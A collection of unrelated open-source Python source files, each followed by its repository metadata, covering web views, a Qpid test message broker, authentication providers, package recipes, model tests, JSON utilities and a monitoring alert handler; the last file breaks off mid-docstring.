a['goal']=goal.freggie_goal
goallist.append(a)
return render_to_response('profile/profile.html',
{'goallist':goallist,
'freggies': freggies,
'nonvegs': nonvegs,
'combolist':combolist},
context_instance = RequestContext(request),)
@login_required
def admin_profile(request, username):
u=get_object_or_404(User, username=username)
p=get_object_or_404(UserProfile, user=u)
nonvegs=NonVeg.objects.filter(user=u)
freggies=Freggie.objects.filter(user=u)
combolist = sorted(chain(nonvegs, freggies), key=attrgetter('evdt'),
reverse=True)
return render_to_response('profile/admin-profile.html',
{'combolist':combolist,
'u':u,
'profile':p
},
context_instance = RequestContext(request),)
| videntity/tweatwell | apps/profile/views.py | Python | gpl-2.0 | 3,216 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import with_statement
import collections as _collections
import os as _os
import proton as _proton
import proton.handlers as _handlers
import proton.reactor as _reactor
import uuid as _uuid
import shutil as _shutil
import subprocess as _subprocess
import sys as _sys
import time as _time
import tempfile as _tempfile
import pathlib as _pathlib
class Broker(object):
def __init__(self, scheme, host, port, id=None, user=None, password=None, ready_file=None,
cert=None, key=None, key_password=None, trusted_db=None):
self.scheme = scheme
self.host = host
self.port = port
self.id = id
self.user = user
self.password = password
self.ready_file = ready_file
self.cert = cert
self.key = key
self.key_password = key_password
self.trusted_db = trusted_db
if self.id is None:
self.id = "broker-{0}".format(_uuid.uuid4())
self.container = _reactor.Container(_Handler(self), self.id)
self._config_dir = None
def init(self):
if self.user is not None:
if self.password is None:
self.fail("A password is required for user authentication")
self._init_sasl_config()
if self.scheme == "amqps":
if self.key is None or self.cert is None:
self.fail("if scheme is amqps, key and cert files must be specified")
if not _pathlib.Path(self.key).is_file():
self.fail("key file %s does not exist" % (self.key))
if not _pathlib.Path(self.cert).is_file():
self.fail("cert file %s does not exist" % (self.cert))
if self.trusted_db and not _pathlib.Path(self.trusted_db).is_file():
self.fail("trusted db file %s does not exist" % (self.trusted_db))
def _init_sasl_config(self):
self._config_dir = _tempfile.mkdtemp(prefix="brokerlib-", suffix="")
config_file = _os.path.join(self._config_dir, "proton-server.conf")
sasldb_file = _os.path.join(self._config_dir, "users.sasldb")
_os.environ["PN_SASL_CONFIG_PATH"] = self._config_dir
with open(config_file, "w") as f:
f.write("sasldb_path: {0}\n".format(sasldb_file))
f.write("mech_list: PLAIN SCRAM-SHA-1\n")
command = "echo '{0}' | saslpasswd2 -p -f {1} '{2}'".format \
(self.password, sasldb_file, self.user)
try:
_subprocess.check_call(command, shell=True)
except _subprocess.CalledProcessError as e:
self.fail("Failed adding user to SASL database: {0}", e)
def info(self, message, *args):
pass
def notice(self, message, *args):
pass
def warn(self, message, *args):
pass
def error(self, message, *args):
_sys.stderr.write("{0}\n".format(message.format(*args)))
_sys.stderr.flush()
def fail(self, message, *args):
self.error(message, *args)
_sys.exit(1)
def run(self):
self.container.run()
if _os.path.exists(self._config_dir):
_shutil.rmtree(self.dir, ignore_errors=True)
class _Queue(object):
def __init__(self, broker, address):
self.broker = broker
self.address = address
self.messages = _collections.deque()
self.consumers = _collections.deque()
self.broker.info("Created {0}", self)
def __repr__(self):
return "queue '{0}'".format(self.address)
def add_consumer(self, link):
assert link.is_sender
assert link not in self.consumers
self.consumers.append(link)
self.broker.info("Added consumer for {0} to {1}", link.connection, self)
def remove_consumer(self, link):
assert link.is_sender
try:
self.consumers.remove(link)
except ValueError:
return
self.broker.info("Removed consumer for {0} from {1}", link.connection, self)
def store_message(self, delivery, message):
self.messages.append(message)
self.broker.notice("Stored {0} from {1} on {2}", message, delivery.connection, self)
def forward_messages(self):
credit = sum([x.credit for x in self.consumers])
sent = 0
if credit == 0:
return
while sent < credit:
for consumer in self.consumers:
if consumer.credit == 0:
continue
try:
message = self.messages.popleft()
except IndexError:
self.consumers.rotate(sent)
return
consumer.send(message)
sent += 1
self.broker.notice("Forwarded {0} on {1} to {2}", message, self, consumer.connection)
self.consumers.rotate(sent)
class _Handler(_handlers.MessagingHandler):
def __init__(self, broker):
super(_Handler, self).__init__()
self.broker = broker
self.queues = dict()
self.verbose = False
def on_start(self, event):
interface = "{0}://{1}:{2}".format(self.broker.scheme, self.broker.host, self.broker.port)
if self.broker.scheme == "amqps":
server_ssl_domain = event.container.ssl.server
server_ssl_domain.set_credentials(self.broker.cert, self.broker.key, self.broker.key_password)
if self.broker.trusted_db:
server_ssl_domain.set_trusted_ca_db(self.broker.trusted_db)
server_ssl_domain.set_peer_authentication(_proton.SSLDomain.VERIFY_PEER, self.broker.trusted_db)
else:
server_ssl_domain.set_peer_authentication(_proton.SSLDomain.ANONYMOUS_PEER)
self.acceptor = event.container.listen(interface)
self.broker.notice("Listening for connections on '{0}'", interface)
if self.broker.ready_file is not None:
_time.sleep(0.1) # XXX
with open(self.broker.ready_file, "w") as f:
f.write("ready\n")
def get_queue(self, address):
try:
queue = self.queues[address]
except KeyError:
queue = self.queues[address] = _Queue(self.broker, address)
return queue
def on_link_opening(self, event):
if event.link.is_sender:
if event.link.remote_source.dynamic:
address = "{0}/{1}".format(event.connection.remote_container, event.link.name)
else:
address = event.link.remote_source.address
assert address is not None
event.link.source.address = address
queue = self.get_queue(address)
queue.add_consumer(event.link)
if event.link.is_receiver:
address = event.link.remote_target.address
event.link.target.address = address
def on_link_closing(self, event):
if event.link.is_sender:
queue = self.queues[event.link.source.address]
queue.remove_consumer(event.link)
def on_connection_init(self, event):
event.transport.sasl().allow_insecure_mechs=True
def on_connection_opening(self, event):
# XXX I think this should happen automatically
event.connection.container = event.container.container_id
def on_connection_opened(self, event):
self.broker.notice("Opened connection from {0}", event.connection)
def on_connection_closing(self, event):
self.remove_consumers(event.connection)
def on_connection_closed(self, event):
self.broker.notice("Closed connection from {0}", event.connection)
def on_disconnected(self, event):
self.broker.notice("Disconnected from {0}", event.connection)
self.remove_consumers(event.connection)
def remove_consumers(self, connection):
link = connection.link_head(_proton.Endpoint.REMOTE_ACTIVE)
while link is not None:
if link.is_sender:
queue = self.queues[link.source.address]
queue.remove_consumer(link)
link = link.next(_proton.Endpoint.REMOTE_ACTIVE)
def on_link_flow(self, event):
if event.link.is_sender and event.link.drain_mode:
event.link.drained()
def on_sendable(self, event):
queue = self.get_queue(event.link.source.address)
queue.forward_messages()
def on_settled(self, event):
template = "Container '{0}' {1} {2} to {3}"
container = event.connection.remote_container
source = event.link.source
delivery = event.delivery
if delivery.remote_state == delivery.ACCEPTED:
self.broker.info(template, container, "accepted", delivery, source)
elif delivery.remote_state == delivery.REJECTED:
self.broker.warn(template, container, "rejected", delivery, source)
elif delivery.remote_state == delivery.RELEASED:
self.broker.notice(template, container, "released", delivery, source)
elif delivery.remote_state == delivery.MODIFIED:
self.broker.notice(template, container, "modified", delivery, source)
def on_message(self, event):
message = event.message
delivery = event.delivery
address = event.link.target.address
if address is None:
address = message.address
queue = self.get_queue(address)
queue.store_message(delivery, message)
queue.forward_messages()
#
# def on_unhandled(self, name, event):
# _sys.stderr.write("{0} {1}\n".format(name, event))
# _sys.stderr.flush()
if __name__ == "__main__":
def _print(message, *args):
message = message.format(*args)
_sys.stderr.write("{0}\n".format(message))
_sys.stderr.flush()
class _Broker(Broker):
def info(self, message, *args): _print(message, *args)
def notice(self, message, *args): _print(message, *args)
def warn(self, message, *args): _print(message, *args)
try:
host, port = _sys.argv[1:3]
except IndexError:
_print("Usage: brokerlib <host> <port>")
_sys.exit(1)
try:
port = int(port)
except ValueError:
_print("The port must be an integer")
_sys.exit(1)
broker = _Broker(host, port)
try:
broker.run()
except KeyboardInterrupt:
pass
| tabish121/quiver | python/brokerlib.py | Python | apache-2.0 | 11,350 |
"""Run bark-spider using waitress.
"""
import bark_spider.app
from waitress import serve
serve(bark_spider.app.make_app(), listen="*:8080")
| sixty-north/bark-spider | wsgi.py | Python | agpl-3.0 | 142 |
#! /usr/bin/env python3
"""Test whether given Newick/NHX trees are valid for ProPhyle.
Author: Karel Brinda <kbrinda@hsph.harvard.edu>
Licence: MIT
Example:
$ prophyle_validate_tree.py ~/prophyle/bacteria.nw ~/prophyle/viruses.nw
"""
import os
import sys
import argparse
sys.path.append(os.path.dirname(__file__))
import prophylelib as pro
def main():
parser = argparse.ArgumentParser(description='Verify a Newick/NHX tree')
parser.add_argument(
'tree',
metavar='<tree.nw>',
type=str,
nargs='+',
help='phylogenetic tree (in Newick/NHX)',
)
args = parser.parse_args()
tree_fns = args.tree
ok = True
for tree_fn in tree_fns:
print("Validating '{}'".format(tree_fn))
tree = pro.load_nhx_tree(tree_fn, validate=False)
r = pro.validate_prophyle_nhx_tree(tree, verbose=True, throw_exceptions=False, output_fo=sys.stdout)
if r:
print(" ...OK")
else:
ok = False
print()
sys.exit(0 if ok else 1)
if __name__ == "__main__":
main()
| karel-brinda/prophyle | prophyle/prophyle_validate_tree.py | Python | mit | 1,090 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPy2neo(PythonPackage):
"""Py2neo is a client library and toolkit for working with Neo4j from
within Python applications and from the command line."""
homepage = "http://py2neo.org/"
url = "https://github.com/nigelsmall/py2neo/archive/py2neo-2.0.8.tar.gz"
version('2.0.8', 'e3ec5172a9e006515ef4155688a05a55')
version('2.0.7', '4cfbc5b7dfd7757f3d2e324805faa639')
version('2.0.6', '53e4cdb1a95fbae501c66e541d5f4929')
version('2.0.5', '143b1f9c0aa22faf170c1b9f84c7343b')
version('2.0.4', 'b3f7efd3344dc3f66db4eda11e5899f7')
depends_on("py-setuptools", type='build')
| wscullin/spack | var/spack/repos/builtin/packages/py-py2neo/package.py | Python | lgpl-2.1 | 1,874 |
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from transformers import BertConfig, is_flax_available
from transformers.testing_utils import require_flax, slow
from .test_modeling_flax_common import FlaxModelTesterMixin, ids_tensor, random_attention_mask
if is_flax_available():
from transformers.models.bert.modeling_flax_bert import (
FlaxBertForMaskedLM,
FlaxBertForMultipleChoice,
FlaxBertForNextSentencePrediction,
FlaxBertForPreTraining,
FlaxBertForQuestionAnswering,
FlaxBertForSequenceClassification,
FlaxBertForTokenClassification,
FlaxBertModel,
)
class FlaxBertModelTester(unittest.TestCase):
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
use_attention_mask=True,
use_token_type_ids=True,
use_labels=True,
vocab_size=99,
hidden_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=16,
type_sequence_label_size=2,
initializer_range=0.02,
num_choices=4,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_attention_mask = use_attention_mask
self.use_token_type_ids = use_token_type_ids
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.type_sequence_label_size = type_sequence_label_size
self.initializer_range = initializer_range
self.num_choices = num_choices
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
attention_mask = None
if self.use_attention_mask:
attention_mask = random_attention_mask([self.batch_size, self.seq_length])
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
config = BertConfig(
vocab_size=self.vocab_size,
hidden_size=self.hidden_size,
num_hidden_layers=self.num_hidden_layers,
num_attention_heads=self.num_attention_heads,
intermediate_size=self.intermediate_size,
hidden_act=self.hidden_act,
hidden_dropout_prob=self.hidden_dropout_prob,
attention_probs_dropout_prob=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
type_vocab_size=self.type_vocab_size,
is_decoder=False,
initializer_range=self.initializer_range,
)
return config, input_ids, token_type_ids, attention_mask
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
config, input_ids, token_type_ids, attention_mask = config_and_inputs
inputs_dict = {"input_ids": input_ids, "token_type_ids": token_type_ids, "attention_mask": attention_mask}
return config, inputs_dict
@require_flax
class FlaxBertModelTest(FlaxModelTesterMixin, unittest.TestCase):
all_model_classes = (
(
FlaxBertModel,
FlaxBertForPreTraining,
FlaxBertForMaskedLM,
FlaxBertForMultipleChoice,
FlaxBertForQuestionAnswering,
FlaxBertForNextSentencePrediction,
FlaxBertForSequenceClassification,
FlaxBertForTokenClassification,
FlaxBertForQuestionAnswering,
)
if is_flax_available()
else ()
)
def setUp(self):
self.model_tester = FlaxBertModelTester(self)
@slow
def test_model_from_pretrained(self):
for model_class_name in self.all_model_classes:
model = model_class_name.from_pretrained("bert-base-cased", from_pt=True)
outputs = model(np.ones((1, 1)))
self.assertIsNotNone(outputs)
| huggingface/pytorch-transformers | tests/test_modeling_flax_bert.py | Python | apache-2.0 | 5,250 |
#!/usr/bin/env python
"""
[appname]
[author]
[description]
"""
import os
from flask import Flask, render_template, url_for
def static(filename):
"""Provides the 'static' function that also appends the file's timestamp to the URL, usable in a template."""
timestamp = os.path.getmtime(os.path.join(app.static_folder, filename))
return "%s/%s?%s" % (app.static_url_path, filename, timestamp)
# Flask application
app = Flask(__name__)
app.jinja_env.globals.update(static=static)
# Views
@app.route('/')
def index():
return render_template('index.html')
@app.errorhandler(404)
def page_not_found(error):
return render_template('error404.html'), 404
# Run dev server
if __name__ == '__main__':
app.run('localhost', port=80, debug=True)
| joeyespo/flask-scaffold | [appname].py | Python | mit | 763 |
import PyOpenWorm as P
from PyOpenWorm import Cell
class Muscle(Cell):
"""A single muscle cell.
See what neurons innervate a muscle:
Example::
>>> mdr21 = P.Muscle('MDR21')
>>> innervates_mdr21 = mdr21.innervatedBy()
>>> len(innervates_mdr21)
4
Attributes
----------
neurons : ObjectProperty
Neurons synapsing with this muscle
receptors : DatatypeProperty
Get a list of receptors for this muscle if called with no arguments,
or state that this muscle has the given receptor type if called with
an argument
"""
def __init__(self, name=False, **kwargs):
Cell.__init__(self, name=name, **kwargs)
self.innervatedBy = Muscle.ObjectProperty("neurons",owner=self,value_type=P.Neuron, multiple=True)
Muscle.DatatypeProperty("receptors",owner=self,multiple=True)
def __str__(self):
return self.name()
| hnunner/PyOpenWorm | PyOpenWorm/muscle.py | Python | mit | 935 |
import abc
from sqlalchemy.orm import exc
from watson.auth import crypto
from watson.auth.providers import exceptions
from watson.common import imports
from watson.common.decorators import cached_property
class Base(object):
config = None
session = None
def __init__(self, config, session):
self._validate_configuration(config)
self.config = config
self.session = session
# Configuration
def _validate_configuration(self, config):
if 'class' not in config['model']:
raise exceptions.InvalidConfiguration(
'User model not specified, ensure "class" key is set on provider["model"].')
common_keys = [
'system_email_from_address',
'reset_password_route',
'forgotten_password_route']
for key in common_keys:
if key not in config:
raise exceptions.InvalidConfiguration(
'Ensure "{}" key is set on the provider.'.format(key))
# User retrieval
@property
def user_model_identifier(self):
return self.config['model']['identifier']
@cached_property
def user_model(self):
return imports.load_definition_from_string(
self.config['model']['class'])
@property
def user_query(self):
return self.session.query(self.user_model)
def get_user(self, username):
"""Retrieves a user from the database based on their username.
Args:
username (string): The username of the user to find.
"""
user_field = getattr(self.user_model, self.user_model_identifier)
try:
return self.user_query.filter(user_field == username).one()
except exc.NoResultFound:
return None
def get_user_by_email_address(self, email_address):
email_column = getattr(
self.user_model, self.config['model']['email_address'])
try:
return self.user_query.filter(email_column == email_address).one()
except exc.NoResultFound:
return None
# Authentication
def authenticate(self, username, password):
"""Validate a user against a supplied username and password.
Args:
username (string): The username of the user.
password (string): The password of the user.
"""
password_config = self.config['password']
if len(password) > password_config['max_length']:
return None
user = self.get_user(username)
if user:
if crypto.check_password(password, user.password, user.salt,
self.config['encoding']):
return user
return None
def user_meets_requirements(self, user, requires):
for require in requires or []:
if not require(user):
return False
return True
# Authorization
def is_authorized(self, user, roles=None, permissions=None, requires=None):
no_role = roles and not user.acl.has_role(roles)
no_permission = permissions and not user.acl.has_permission(
permissions)
no_requires = self.user_meets_requirements(user, requires)
return False if no_role or no_permission or not no_requires else True
# Actions
@abc.abstractmethod
def logout(self, request):
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def login(self, user, request):
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def handle_request(self, request):
raise NotImplementedError # pragma: no cover
| watsonpy/watson-auth | watson/auth/providers/abc.py | Python | bsd-3-clause | 3,673 |
# Copyright 2010-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = ['getmaskingreason']
import portage
from portage import os
from portage.const import USER_CONFIG_PATH
from portage.dep import Atom, match_from_list
from portage.exception import InvalidAtom
from portage.localization import _
from portage.repository.config import _gen_valid_repo
from portage.util import grablines, normalize_path
from portage.versions import catpkgsplit, _pkg_str
def getmaskingreason(mycpv, metadata=None, settings=None,
portdb=None, return_location=False, myrepo=None):
"""
If specified, the myrepo argument is assumed to be valid. This
should be a safe assumption since portdbapi methods always
return valid repo names and valid "repository" metadata from
aux_get.
"""
if settings is None:
settings = portage.settings
if portdb is None:
portdb = portage.portdb
mysplit = catpkgsplit(mycpv)
if not mysplit:
raise ValueError(_("invalid CPV: %s") % mycpv)
if metadata is None:
db_keys = list(portdb._aux_cache_keys)
try:
metadata = dict(zip(db_keys,
portdb.aux_get(mycpv, db_keys, myrepo=myrepo)))
except KeyError:
if not portdb.cpv_exists(mycpv):
raise
else:
if myrepo is None:
myrepo = _gen_valid_repo(metadata["repository"])
elif myrepo is None:
myrepo = metadata.get("repository")
if myrepo is not None:
myrepo = _gen_valid_repo(metadata["repository"])
if metadata is not None and \
not portage.eapi_is_supported(metadata["EAPI"]):
# Return early since otherwise we might produce invalid
# results given that the EAPI is not supported. Also,
# metadata is mostly useless in this case since it doesn't
# contain essential things like SLOT.
if return_location:
return (None, None)
else:
return None
# Sometimes we can't access SLOT or repository due to corruption.
pkg = mycpv
try:
pkg.slot
except AttributeError:
pkg = _pkg_str(mycpv, metadata=metadata, repo=myrepo)
cpv_slot_list = [pkg]
mycp = pkg.cp
# XXX- This is a temporary duplicate of code from the config constructor.
locations = [os.path.join(settings["PORTDIR"], "profiles")]
locations.extend(settings.profiles)
for ov in settings["PORTDIR_OVERLAY"].split():
profdir = os.path.join(normalize_path(ov), "profiles")
if os.path.isdir(profdir):
locations.append(profdir)
locations.append(os.path.join(settings["PORTAGE_CONFIGROOT"],
USER_CONFIG_PATH))
locations.reverse()
pmasklists = []
for profile in locations:
pmask_filename = os.path.join(profile, "package.mask")
node = None
for l, recursive_filename in grablines(pmask_filename,
recursive=1, remember_source_file=True):
if node is None or node[0] != recursive_filename:
node = (recursive_filename, [])
pmasklists.append(node)
node[1].append(l)
pmaskdict = settings._mask_manager._pmaskdict
if mycp in pmaskdict:
for x in pmaskdict[mycp]:
if match_from_list(x, cpv_slot_list):
x = x.without_repo
for pmask in pmasklists:
comment = ""
comment_valid = -1
pmask_filename = pmask[0]
for i in range(len(pmask[1])):
l = pmask[1][i].strip()
try:
l_atom = Atom(l, allow_repo=True,
allow_wildcard=True).without_repo
except InvalidAtom:
l_atom = None
if l == "":
comment = ""
comment_valid = -1
elif l[0] == "#":
comment += (l+"\n")
comment_valid = i + 1
elif l_atom == x:
if comment_valid != i:
comment = ""
if return_location:
return (comment, pmask_filename)
else:
return comment
elif comment_valid != -1:
# Apparently this comment applies to multiple masks, so
# it remains valid until a blank line is encountered.
comment_valid += 1
if return_location:
return (None, None)
else:
return None
| clickbeetle/portage-cb | pym/portage/package/ebuild/getmaskingreason.py | Python | gpl-2.0 | 3,872 |
#!/usr/bin/env python
from flask.ext import restful
from awbwFlask import mongo
from awbwFlask.common.methods import bsonToJson, generate_auth_token, hash_password, verify_auth_token, verify_password
from awbwFlask.common.variables import headers
class Login_EP(restful.Resource):
def __init__(self):
self.reqparse = restful.reqparse.RequestParser()
self.reqparse.add_argument('username', type=str, help='Invalid username')
self.reqparse.add_argument('password', type=str, help='Invalid password')
self.reqparse.add_argument('Awbw-Token', type=str, help='Invalid Token', location='headers')
super(Login_EP, self).__init__()
def post(self):
args = self.reqparse.parse_args()
if args['Awbw-Token']:
token_data = verify_auth_token(args['Awbw-Token'])
if not token_data:
return {"message": "Invalid user token"}, 401, headers
user = {'_id': token_data["_id"], 'username': token_data["username"]}
message = "Logged in with token"
else:
user = mongo.db.users.find_one({ 'username': args['username'] })
if not user:
return {"message": "Login with username {} does not exist".format(args['username'])}, 404, headers
if not verify_password(args['password'], user['password']):
return {"message": "Invalid password for user {}".format(args['username'])}, 401, headers
message = "Logged in with credentials"
return {"message": message, "username": user["username"], "token": generate_auth_token(bsonToJson(user))}, 200
if __name__ == '__main__':
app.run(debug=True)
| amarriner/awbwFlask | resources/LoginAPI.py | Python | mit | 1,642 |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''
JSON related utilities.
This module provides a few things:
1) A handy function for getting an object down to something that can be
JSON serialized. See to_primitive().
2) Wrappers around loads() and dumps(). The dumps() wrapper will
automatically use to_primitive() for you if needed.
3) This sets up anyjson to use the loads() and dumps() wrappers if anyjson
is available.
'''
import datetime
import functools
import inspect
import itertools
import json
try:
import xmlrpclib
except ImportError:
# NOTE(jaypipes): xmlrpclib was renamed to xmlrpc.client in Python3
# however the function and object call signatures
# remained the same. This whole try/except block should
# be removed and replaced with a call to six.moves once
# six 1.4.2 is released. See http://bit.ly/1bqrVzu
import xmlrpc.client as xmlrpclib
import six
from barbican.openstack.common import gettextutils
from barbican.openstack.common import importutils
from barbican.openstack.common import timeutils
netaddr = importutils.try_import("netaddr")
_nasty_type_tests = [inspect.ismodule, inspect.isclass, inspect.ismethod,
inspect.isfunction, inspect.isgeneratorfunction,
inspect.isgenerator, inspect.istraceback, inspect.isframe,
inspect.iscode, inspect.isbuiltin, inspect.isroutine,
inspect.isabstract]
_simple_types = (six.string_types + six.integer_types
+ (type(None), bool, float))
def to_primitive(value, convert_instances=False, convert_datetime=True,
level=0, max_depth=3):
"""Convert a complex object into primitives.
Handy for JSON serialization. We can optionally handle instances,
but since this is a recursive function, we could have cyclical
data structures.
To handle cyclical data structures we could track the actual objects
visited in a set, but not all objects are hashable. Instead we just
track the depth of the object inspections and don't go too deep.
Therefore, convert_instances=True is lossy ... be aware.
"""
# handle obvious types first - order of basic types determined by running
# full tests on nova project, resulting in the following counts:
# 572754 <type 'NoneType'>
# 460353 <type 'int'>
# 379632 <type 'unicode'>
# 274610 <type 'str'>
# 199918 <type 'dict'>
# 114200 <type 'datetime.datetime'>
# 51817 <type 'bool'>
# 26164 <type 'list'>
# 6491 <type 'float'>
# 283 <type 'tuple'>
# 19 <type 'long'>
if isinstance(value, _simple_types):
return value
if isinstance(value, datetime.datetime):
if convert_datetime:
return timeutils.strtime(value)
else:
return value
# value of itertools.count doesn't get caught by nasty_type_tests
# and results in infinite loop when list(value) is called.
if type(value) == itertools.count:
return six.text_type(value)
# FIXME(vish): Workaround for LP bug 852095. Without this workaround,
# tests that raise an exception in a mocked method that
# has a @wrap_exception with a notifier will fail. If
# we up the dependency to 0.5.4 (when it is released) we
# can remove this workaround.
if getattr(value, '__module__', None) == 'mox':
return 'mock'
if level > max_depth:
return '?'
# The try block may not be necessary after the class check above,
# but just in case ...
try:
recursive = functools.partial(to_primitive,
convert_instances=convert_instances,
convert_datetime=convert_datetime,
level=level,
max_depth=max_depth)
if isinstance(value, dict):
return dict((k, recursive(v)) for k, v in six.iteritems(value))
elif isinstance(value, (list, tuple)):
return [recursive(lv) for lv in value]
# It's not clear why xmlrpclib created their own DateTime type, but
# for our purposes, make it a datetime type which is explicitly
# handled
if isinstance(value, xmlrpclib.DateTime):
value = datetime.datetime(*tuple(value.timetuple())[:6])
if convert_datetime and isinstance(value, datetime.datetime):
return timeutils.strtime(value)
elif isinstance(value, gettextutils.Message):
return value.data
elif hasattr(value, 'iteritems'):
return recursive(dict(value.iteritems()), level=level + 1)
elif hasattr(value, '__iter__'):
return recursive(list(value))
elif convert_instances and hasattr(value, '__dict__'):
# Likely an instance of something. Watch for cycles.
# Ignore class member vars.
return recursive(value.__dict__, level=level + 1)
elif netaddr and isinstance(value, netaddr.IPAddress):
return six.text_type(value)
else:
if any(test(value) for test in _nasty_type_tests):
return six.text_type(value)
return value
except TypeError:
# Class objects are tricky since they may define something like
# __iter__ defined but it isn't callable as list().
return six.text_type(value)
def dumps(value, default=to_primitive, **kwargs):
return json.dumps(value, default=default, **kwargs)
def loads(s):
return json.loads(s)
def load(s):
return json.load(s)
try:
import anyjson
except ImportError:
pass
else:
anyjson._modules.append((__name__, 'dumps', TypeError,
'loads', ValueError, 'load'))
anyjson.force_implementation(__name__)
| stanzikratel/barbican-2 | barbican/openstack/common/jsonutils.py | Python | apache-2.0 | 6,717 |
__all__ = ["Cipher", "Util"]
| repotvsupertuga/tvsupertuga.repository | script.module.cryptolib/lib/Crypto/__init__.py | Python | gpl-2.0 | 29 |
from etcd import EtcdKeyNotFound
from subprocess import CalledProcessError
from tendrl.commons.event import Event
from tendrl.commons.message import ExceptionMessage
from tendrl.commons.utils import log_utils as logger
from tendrl.monitoring_integration.alert import constants
from tendrl.monitoring_integration.alert.handlers import AlertHandler
from tendrl.monitoring_integration.alert import utils
from tendrl.monitoring_integration.alert.exceptions import InvalidAlertSeverity
from tendrl.monitoring_integration.alert.exceptions import NodeNotFound
class CpuHandler(AlertHandler):
handles = 'cpu'
representive_name = 'cpu_alert'
def __init__(self):
AlertHandler.__init__(self)
self.template = "tendrl.clusters.{cluster_id}.nodes.{host_name}.cpu"
def format_alert(self, alert_json):
alert = self.parse_alert_metrics(alert_json)
try:
alert["alert_id"] = None
alert["node_id"] = utils.find_node_id(
alert['tags']['integration_id'],
alert['tags']['fqdn']
)
alert["time_stamp"] = alert_json['NewStateDate']
alert["resource"] = self.representive_name
alert['alert_type'] = constants.ALERT_TYPE
alert['severity'] = constants.TENDRL_GRAFANA_SEVERITY_MAP[
alert_json['State']]
alert['significance'] = constants.SIGNIFICANCE_HIGH
alert['pid'] = utils.find_grafana_pid()
alert['source'] = constants.ALERT_SOURCE
alert['tags']['fqdn'] = alert['tags']['fqdn']
alert['classification'] = alert_json["classification"]
if alert['severity'] == "WARNING":
alert['tags']['message'] = (
"Cpu utilization of node %s is"
" %s which is above the %s threshold (%s)." % (
alert['tags']['fqdn'],
alert['current_value'],
alert['severity'],
alert['tags']['warning_max']))
elif alert['severity'] == "INFO":
alert['tags']['message'] = ("Cpu utilization of node %s is"
" back to normal" % (
alert['tags']['fqdn']))
else:
logger.log(
"error",
NS.publisher_id,
{
"message": "Alert %s have unsupported alert"
"severity" % alert_json
}
)
raise InvalidAlertSeverity
return alert
except (KeyError,
CalledProcessError,
EtcdKeyNotFound,
NodeNotFound,
InvalidAlertSeverity) as ex:
Event(
ExceptionMessage(
"error",
NS.publisher_id,
{
"message": "Error in converting grafana"
"alert into tendrl alert %s" % alert_json,
"exception": ex
}
)
)
def parse_alert_metrics(self, alert_json):
"""
{
"EvalData": {
"evalMatches": [{
"metric": "sumSeries(sumSeries(tendrl.clusters.ab3b125e-4769
-4071-a349-e82b380c11f4.nodes.{host_name}.
cpu.percent-system),sumSeries(tendrl.clusters.ab3b125e-4769-4071
-a349-e82b380c11f4.nodes.{host_name}.cpu.
percent-user))",
